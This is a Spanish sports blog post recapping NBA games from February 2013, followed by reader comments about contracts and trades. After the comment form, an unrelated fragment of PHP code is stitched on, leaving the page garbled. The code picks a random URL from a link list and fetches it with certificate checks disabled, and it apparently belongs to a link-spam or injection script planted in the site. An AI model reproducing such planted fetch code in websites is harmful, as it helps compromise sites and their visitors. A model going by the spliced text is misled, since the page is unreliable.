La Crónica: Esperando el All-Star

14 de February de 2013 por Simon

Penúltima jornada antes de que los mejores jugadores de la liga se reúnan en Houston para la disputa de All-Star. Mientras esto llega, ayer se disputó una típica jornada de miércoles cargada de partidos, en la que hubo varios encuentros destacables como la victoria de Boston sobre Chicago en un partido con un marcador típico europeo pero que no estamos tan acostumbrados a ver en la NBA (69-71).  Boston Celtics anotó en el último cuarto poco menos de  la mitad de lo que terminó anotando en todo el partido. Fue un partido muy feo, con ambos equipos muy desacertados en todas sus acciones en el que finalmente, en el cuarto decisivo,  los Celtics se mostraron más entonados, lo que les permitió llevarse la victoria y volver a la senda de la victoria tras la derrota sufrida en el partido anterior ante Charlotte. Precisamente los Bobcats también jugaron anoche ante Indiana Pacers y se llevaron una buena tunda (77-101). Paul George estuvo absolutamente espectacular firmando un triple doble (23 puntos, 12 rebotes y otras tantas asistencias) y marcando el territorio ante la inminente vuelta de Danny Granger.

Siguiendo en el Este, vimos a Brooklyn Nets infligir a Denver Nuggets su tercera derrota en su gira por el Este con un Joe Johnson espectacular con 26 puntos y 9 asistencias y que estuvo muy bien acompañado por CJ Watson con 25 puntos y 6 asistencias. Gran rendimiento el del base suplente de los Nets que ayer fue titular por la baja de Deron (108-119). Importante victoria para Brooklyn ante un rival complicado que los aúpa a la cuarta plaza del Este aprovechando la derrota de Chicago. Los Nuggets volvieron a jugar sin Gallinari e Iguodala, ambos tocados. 

Los vecinos de los Nets, los New York Knicks, se vieron sorprendidos en el Madison por unos Toronto Raptors (92-88) a los que el traspaso ha sentado muy bien a pesar de que precisamente ayer Rudy Gay estuvo horrible fallando 17 lanzamientos en 21 intentos. Tampoco estuvo muy acertado su par en los Knicks, Carmelo Anthony, que falló 19 de sus 24 intentos de canasta. El jugador del partido fue el suplente de Raptors Alan Anderson, que estuvo imparable y con 26 puntos llevó a su equipo a una victoria inesperada que deja a los Raptors muy cerquita de los Sixers, que ayer dieron otro paso atrás en sus aspiraciones por clasificarse para Play Off tras perder en la pista de los Bucks por 92-94. Monta Ellis volvió a ser el mejor y guió a su equipo a una victoria vital ante un rival directo.

El partido de la jornada entre Houston y Los Angeles Clippers se vio descafeinado por la baja de James Harden por un pequeño esguince. Clippers anotó ¡46 puntos! en el primer cuarto y a partir de ahí solo tuvieron que administrar la ventaja conseguida. El mejor de los Clippers fue Blake Griffin con 20 puntos y 11 rebotes (96-106).

Los líderes de la liga, San Antonio Spurs, se vieron apurados para lograr la victoria en Cleveland a pesar del retorno a la acción del Big Three. Cleveland plantó cara durante todo el partido a San Antonio a pesar de que su joven estrella, Kyrie Irving, estuvo desacertadísimo. El rookie Dion Waiters puso a los Cavs dos arriba a falta de 9 segundos pero en el siguiente ataque Tony Parker dio un pase a la esquina para que Kawhi Leonard anotara el triple que dio la victoria a San Antonio Spurs (96-95).

En cuanto a lo que participación española se refiere, sólo Calderón pudo ganar anoche y fue el mejor de su equipo con 24 puntos en la victoria de Detroit ante Washington (85-96). Ricky Rubio jugó un partido excelente con 18 puntos, 10 asistencias y 9 rebotes al borde del triple doble, pero no sirvió para llevarse la victoria ante unos Jazz que van lanzados a asegurarse los Play Off y hoy en día están más cerca de ser sextos que octavos (97-93). Los Blazers de Víctor Claver fueron arrasados por los Hornets en un partido en el que el quinteto Blazers terminó el partido con 11 de 41 en tiros de campo. Anthony Davis ganó esta vez el duelo de Rookies a Lillard con 21 puntos y 11 rebotes (63-99).

En el resto de la jornada, Atlanta se acerca a Chicago en la clasificación tras la victoria de ayer ante Orlando Magic por 33 puntos de diferencia (108-76) con un gran partido de la pareja Horford y Smith y Dallas venció sin problemas a Sacramento (100-123) con un gran partido de Vince Carter, autor de 26 puntos desde el banquillo.

PREMIOS

MVP: Como comentábamos en la crónica, Paul George marca territorio ante el retorno del antiguo macho alfa de los Pacers. Complicado que Granger supere el nivel que dejó ayer George que se fue a los 23 puntos, 12 rebotes y 12 asistencias. Por su parte, Josh Smith y Al Horford se merendaron a los Magic. El primero, con 30 puntos, 10 rebotes y 5 asistencias y el segundo, con 26 puntos, 12 rebotes y 5 asistencias.

Rookie: Anthony Davis se reivincida ante Damian Lillard con 21 puntos y 11 rebotes. Dion Waiters anotó 20 puntos y casi le da la victoria a su equipo ante los Spurs.

Sorpresa: Grandísimo partido de Derrick Williams, autor de 24 puntos y 16 rebotes. Necesita muchos de estos para recuperar la confianza y demostrar lo que lleva dentro. CJ Watson (25 puntos y 6 asistencias)  también se salió en sustitución de Deron Williams.

Decepción: Duelo ente Carmelo Anthony y Rudy Gay por comprobar quién era capaz de fallar más tiros. Ganó el primero tras fallar 19 lanzamientos mientras que el segundo se “quedó” en 17.

Esfuerzo en vano: Ante las bajas de Gallinari e Iguodala Ty Lawson se multiplica y nos deja actuaciones como las de anoche: 26 puntos (8 de 11) y 9 asistencias. Lamentablemente no fue suficiente. Ricky Rubio estuvo a punto de marcarse un triple-doble pero tampoco se llevó la victoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran analisis Simón. ¿alguien puede confirmarme su Paul y Griffin han renovado por Clippers? Recuerdo que acababan contrato y no oigo rumores sobre su futuro.

      Citar

  2. Ruxixón dice:
    #2

    A mí me suena que en verano le habían ofrecido el máximo a Blake Griffin pero no es algo confirmado por lo que veo.

      Citar

  3. Ruxixón dice:
    #3

    Ruxixón:
    A mí me suena que en verano le habían ofrecido el máximo a Blake Griffin pero no es algo confirmado por lo que veo.

    Acabo de buscar y en basketball reference así lo indica,de CP3 no sabemos nada por tanto.

    http://www.basketball-reference.com/contracts/LAC.html

      Citar

  4. Denise dice:
    #4

    Ruxixón: Acabo de buscar y en basketball reference así lo indica,de CP3 no sabemos nada por tanto.

    http://www.basketball-reference.com/contracts/LAC.html

    Gracias tio..lo decóa porque se habla mucho del futuro de Howard o Josh Smith, pero nada del de Paul, supongo que es a que no tiene motivos para salir de Clippers ahora mismo y renovará seguramente

      Citar

  5. Esteban dice:
    #5

    griffin ya renovo por un pastizal como el de ROSE en los bulls, por la nueva clausula que dice que si un rookie en su contrato de tal es all-star, puede cobrar mas, bueno los clippers le pagaron todito

    cp3 no ha renovado, aparentemente estaria contento con el proyecto y da la sensacion de que renovaria…

    yo no estoy del todo seguro, veo a los MAVS pujando fuertisimo por el, con tanto espacio y con dirk podria tentar a paul, es el unico equipo que creo que podria meterse seriamente entre los destinos de paul y los clippers

      Citar

  6. Esteban dice:
    #6

    no habia comentado, pero q partido de PAUL GEORGE, 23 puintos 12 rebotes y 12 asistencias,

    si alguien me pregunta quien pude hacer esos numeros en la actualidad solo diria un tal LEBRON JAMES

    parece q george puede ser un jugador franquicia enserio

    ahora vuelve granger, espero que por fin en indiana noten que la mejoria de george se debe a que juega de alero y no de escolta, hace casi dos años que rogabamos por ese cambio aqui, de hecho lo puse en mi analisis sobre los pacers

    ahora mismo es tema es q hacer cong granger, su valor de mercado es muy bajo en comparacion al rendimiento que podria ofrecer,

    si los paceres consiguieran por el a un derozan, ellis o el propio o.j. mayo seria de lujo, pero no veo a estos equipos entregando algo asi pro granger, lo mejor seria quedarselo y sacarlo de la banca

      Citar

  7. Ruxixón dice:
    #7

    No sé,por dinero le puede ofrecer un año más Clippers a CP3 y en cuanto a proyecto Clippers también gana en estos momentos,a priori no habría razón por la que Paul pudiera elegir Dallas.

      Citar

  8. Esteban dice:
    #8

    ayer pensando mientras estaba de gusto, se me ocurrio un buen trade

    viendo que los bucks dificilmente le paguen el maximo a jennings, estaba buscando un equipo que si lo haga y se me vino a la mante detroit

    los pistons podrian ofrecerle a los bucks a brendan knight y su seleccion de primera ronda bien alta de este año (teniendo en cuenta que ya tienen suficiente jovenes en monroe y drummond al que podria sumarle singler),

    mientras que los bucks antes de perder a jennings, podrian sumar un joven base interesante como knight y una seleccion top 10, no estaria del nada mal

    los pistons consiguen un jugador franquicia joven para empezar a pensar en PO y que ayude a sus jovenes internos

      Citar

  9. Txusma dice:
    #9

    Brandon Jennings jugador franquicia? No lo acabo de ver nada claro… Veo a Monroe más jugador franquicia que él, fíjate.

      Citar

  10. Esteban dice:
    #10

    Ruxixón:
    No sé,por dinero le puede ofrecer un año más Clippers a CP3 y en cuanto a proyecto Clippers también gana en estos momentos,a priori no habría razón por la que Paul pudiera elegir Dallas.

    esto es al dia de hoy ruxixon, pero el año proximo comeinza a contar el contrato de 20 millones de griffin, sumado a los 10 de jordan, 8 de butler, 5 de crawford, estarian en 43 millones
    lños 20 de CP3 y hablamos de 63 millones

    el proximo año en los clippers no habra bledsone ni de coña, ni mucho menos barnes despues del temporadon que esta haciendo se ganara un muy buen contraro y dudo que hill siga jugando y odom no va a firmar por el minimo

    es decir, los ultimos dos años los clippers han gozado de un espectacular all-star como griffin cobrando la baratija de su contrato rookie, los que les permitio tener mucha capacidad salarial extra

    esa capacidad desaparecera el proximo año, habra que ver si el propyecto clippers incluye pagar impuesto de lujo sin sonrojarse como si lo haria cuban en dallas

    por otra parte DALLAS tendra espacio de sobra la proxima temporada, jugar con un MVP comop DIRK, mas un contrato exelente por precio/calidad como Mayo, y una renovacion a la baja de MARION (exepcion de nivel medio), aun tendrian margen para renovar a kaman a buen precio y sumar a CP3

    CP3-MAYO-MARION-DIRK-KAMAN
    COLLISON entre y espacio para algun sexto hombre entre otros

    el propio granger tambien podria caer alli

      Citar

  11. Pop dice:
    #11

    Cada vez que leo 4 o 5 comentarios seguidos de Esteban se me enredan las plantillas de cada equipo de tal manera que tengo que hacer un reseteo de las mismas tipo NBA2K cuando las has tocado mucho, porque ya ni me acuerdo de quién juega dónde.

    Esteban, te voy a regalar el monopoly NBA!!

      Citar

  12. Esteban dice:
    #12

    jajajaja si, me gusta fantasear en intercambio

      Citar

  13. Victor dice:
    #13

    Vinsanity supera a Bird en la tabla de maximos anotadores de la historia de la liga y ni un simple guiño. Pues vaya…

      Citar

  14. Simon dice:
    #14

    Victor:
    Vinsanity supera a Bird en la tabla de maximos anotadores de la historia de la liga y ni un simple guiño. Pues vaya…

    A veces hay cosas que se nos escapan y más cuando las jornadas son tan grandes y no puedes mirar todo al detalle… la próxima vez estaremos más atentos. Lo sentimos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>